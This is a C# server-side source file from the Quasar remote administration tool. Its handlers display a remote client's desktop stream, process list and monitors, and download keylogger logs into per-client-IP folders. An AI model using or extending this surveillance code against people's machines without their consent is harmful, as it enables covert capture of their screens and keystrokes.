Quasar/Server/Core/Commands/SurveillanceHandler.cs

207 lines
7.2 KiB
C#
Raw Normal View History

using System.Drawing;
using System.IO;
using System.Threading;
using System.Windows.Forms;
using xServer.Core.Helper;
using xServer.Core.Packets.ClientPackets;
namespace xServer.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT ARE USED FOR SURVEILLANCE. */
public static partial class CommandHandler
{
public static void HandleRemoteDesktopResponse(Client client, DesktopResponse packet)
{
if (client.Value.FrmRdp == null)
return;
if (packet.Image == null)
{
try
{
client.Value.FrmRdp.Invoke(
(MethodInvoker)delegate { client.Value.FrmRdp.picDesktop.Image = client.Value.LastDesktop; });
}
catch
{
}
client.Value.LastDesktop = null;
client.Value.LastDesktopSeen = true;
return;
}
// we can not dispose all bitmaps here, cause they are later used again in `client.Value.LastDesktop`
if (client.Value.LastDesktop == null)
{
if (client.Value.StreamCodec != null)
{
client.Value.StreamCodec.Dispose();
}
client.Value.StreamCodec = new UnsafeStreamCodec();
if (client.Value.LastQuality != packet.Quality || client.Value.LastMonitor != packet.Monitor)
{
client.Value.LastQuality = packet.Quality;
client.Value.LastMonitor = packet.Monitor;
}
using (MemoryStream ms = new MemoryStream(packet.Image))
{
Bitmap newScreen = client.Value.StreamCodec.DecodeData(ms);
client.Value.LastDesktop = newScreen;
try
{
client.Value.FrmRdp.Invoke(
(MethodInvoker)
delegate { client.Value.FrmRdp.picDesktop.Image = (Bitmap)newScreen.Clone(); });
}
catch
{
}
newScreen = null;
}
}
else
{
using (MemoryStream ms = new MemoryStream(packet.Image))
{
lock (client.Value.StreamCodec)
{
if (client.Value.LastQuality != packet.Quality || client.Value.LastMonitor != packet.Monitor)
{
if (client.Value.StreamCodec != null)
{
client.Value.StreamCodec.Dispose();
}
client.Value.StreamCodec = new UnsafeStreamCodec();
client.Value.LastQuality = packet.Quality;
client.Value.LastMonitor = packet.Monitor;
}
Bitmap newScreen = client.Value.StreamCodec.DecodeData(ms);
client.Value.LastDesktop = newScreen;
try
{
client.Value.FrmRdp.Invoke(
(MethodInvoker)
delegate { client.Value.FrmRdp.picDesktop.Image = (Bitmap)newScreen.Clone(); });
}
catch
{
}
newScreen = null;
}
}
}
packet.Image = null;
client.Value.LastDesktopSeen = true;
}
public static void HandleGetProcessesResponse(Client client, GetProcessesResponse packet)
{
if (client.Value.FrmTm == null)
return;
client.Value.FrmTm.Invoke((MethodInvoker)delegate { client.Value.FrmTm.lstTasks.Items.Clear(); });
new Thread(() =>
{
for (int i = 0; i < packet.Processes.Length; i++)
{
if (packet.IDs[i] != 0 && packet.Processes[i] != "System.exe")
{
ListViewItem lvi =
new ListViewItem(new string[] { packet.Processes[i], packet.IDs[i].ToString(), packet.Titles[i] });
try
{
client.Value.FrmTm.Invoke(
(MethodInvoker)delegate { client.Value.FrmTm.lstTasks.Items.Add(lvi); });
}
catch
{
break;
}
}
}
}).Start();
}
public static void HandleGetLogsResponse(Client client, GetLogsResponse packet)
{
if (client.Value.FrmKl == null)
return;
if (packet.FileCount == 0)
{
client.Value.FrmKl.Invoke((MethodInvoker)delegate
{
client.Value.FrmKl.btnGetLogs.Enabled = true;
});
return;
}
string downloadPath = Path.Combine(Application.StartupPath, "Clients\\" + client.EndPoint.Address.ToString() + "\\Logs\\");
if (!Directory.Exists(downloadPath))
Directory.CreateDirectory(downloadPath);
downloadPath = Path.Combine(downloadPath, packet.Filename + ".html");
FileSplit destFile = new FileSplit(downloadPath);
destFile.AppendBlock(packet.Block, packet.CurrentBlock);
if (packet.Index == packet.FileCount && (packet.CurrentBlock + 1) == packet.MaxBlocks)
{
FileInfo[] iFiles = new DirectoryInfo(Path.Combine(Application.StartupPath, "Clients\\" + client.EndPoint.Address.ToString() + "\\Logs\\")).GetFiles();
if (iFiles.Length == 0)
return;
foreach (FileInfo file in iFiles)
{
var file1 = file;
client.Value.FrmKl.Invoke((MethodInvoker)delegate
{
client.Value.FrmKl.lstLogs.Items.Add(new ListViewItem() { Text = file1.Name });
});
}
client.Value.FrmKl.Invoke((MethodInvoker)delegate
{
client.Value.FrmKl.btnGetLogs.Enabled = true;
});
}
}
public static void HandleMonitorsResponse(Client client, MonitorsResponse packet)
{
if (client.Value.FrmRdp == null)
return;
try
{
client.Value.FrmRdp.Invoke((MethodInvoker)delegate
{
for (int i = 0; i < packet.Number; i++)
client.Value.FrmRdp.cbMonitors.Items.Add(string.Format("Monitor {0}", i + 1));
client.Value.FrmRdp.cbMonitors.SelectedIndex = 0;
});
}
catch
{
}
}
}
}